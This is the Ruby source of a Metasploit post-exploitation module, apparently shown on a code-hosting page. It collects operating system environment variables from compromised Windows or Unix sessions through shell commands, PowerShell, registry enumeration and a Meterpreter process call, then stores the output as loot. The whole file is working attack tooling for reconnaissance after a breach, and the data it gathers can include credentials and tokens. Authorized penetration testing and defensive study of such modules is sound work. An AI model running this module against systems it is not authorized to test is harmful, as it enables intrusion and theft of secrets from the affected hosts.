Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Registry
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Multi Gather Generic Operating System Environment Settings',
14
        'Description' => %q{ This module prints out the operating system environment variables. },
15
        'License' => MSF_LICENSE,
16
        'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>', 'egypt' ],
17
        'Platform' => %w[linux win unix],
18
        'SessionTypes' => %w[powershell shell meterpreter],
19
        'Notes' => {
20
          'Stability' => [CRASH_SAFE],
21
          'Reliability' => [],
22
          'SideEffects' => []
23
        },
24
        'Compat' => {
25
          'Meterpreter' => {
26
            'Commands' => %w[
27
              stdapi_sys_config_getenv
28
              stdapi_sys_process_execute
29
            ]
30
          }
31
        }
32
      )
33
    )
34
  end
35

36
  def run
37
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
38
    print_status("Running module against #{hostname} (#{session.session_host})")
39

40
    output = case session.type
41
             when 'shell'
42
               get_env_shell
43
             when 'powershell'
44
               get_env_powershell
45
             when 'meterpreter'
46
               get_env_meterpreter
47
             end
48

49
    fail_with(Failure::Unknown, 'Could not retrieve environment variables') if output.blank?
50

51
    if session.platform == 'windows'
52
      ltype = 'windows.environment'
53
    else
54
      ltype = 'unix.environment'
55
    end
56

57
    print_line(output)
58
    path = store_loot(ltype, 'text/plain', session, output)
59
    print_good("Results saved to #{path}")
60
  end
61

62
  def get_env_shell
63
    cmd = session.platform == 'windows' ? 'set' : 'env'
64
    cmd_exec(cmd)
65
  end
66

67
  def get_env_powershell
68
    res = cmd_exec('Get-ChildItem Env: | ConvertTo-Csv')
69

70
    output = []
71
    csv = CSV.parse(res, skip_lines: /^#/, headers: true)
72
    csv.each do |row|
73
      output << "#{row['Key']}=#{row['Value']}"
74
    end
75

76
    return output.join("\n")
77
  end
78

79
  def get_env_meterpreter
80
    case session.platform
81
    when 'windows'
82
      var_names = []
83
      var_names << registry_enumvals('HKEY_CURRENT_USER\\Volatile Environment')
84
      var_names << registry_enumvals('HKEY_CURRENT_USER\\Environment')
85
      var_names << registry_enumvals('HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment')
86
      var_names.delete(nil)
87

88
      output = []
89
      session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v|
90
        output << "#{k}=#{v}"
91
      end
92
      return output.join("\n")
93
    else
94
      # Don't know what it is, hope it's unix
95
      print_status("Executing 'env' on #{sysinfo['OS']}")
96
      chan = session.sys.process.execute('/bin/sh', '-c env', { 'Channelized' => true })
97
      return chan.read
98
    end
99
  end
100
end
101

102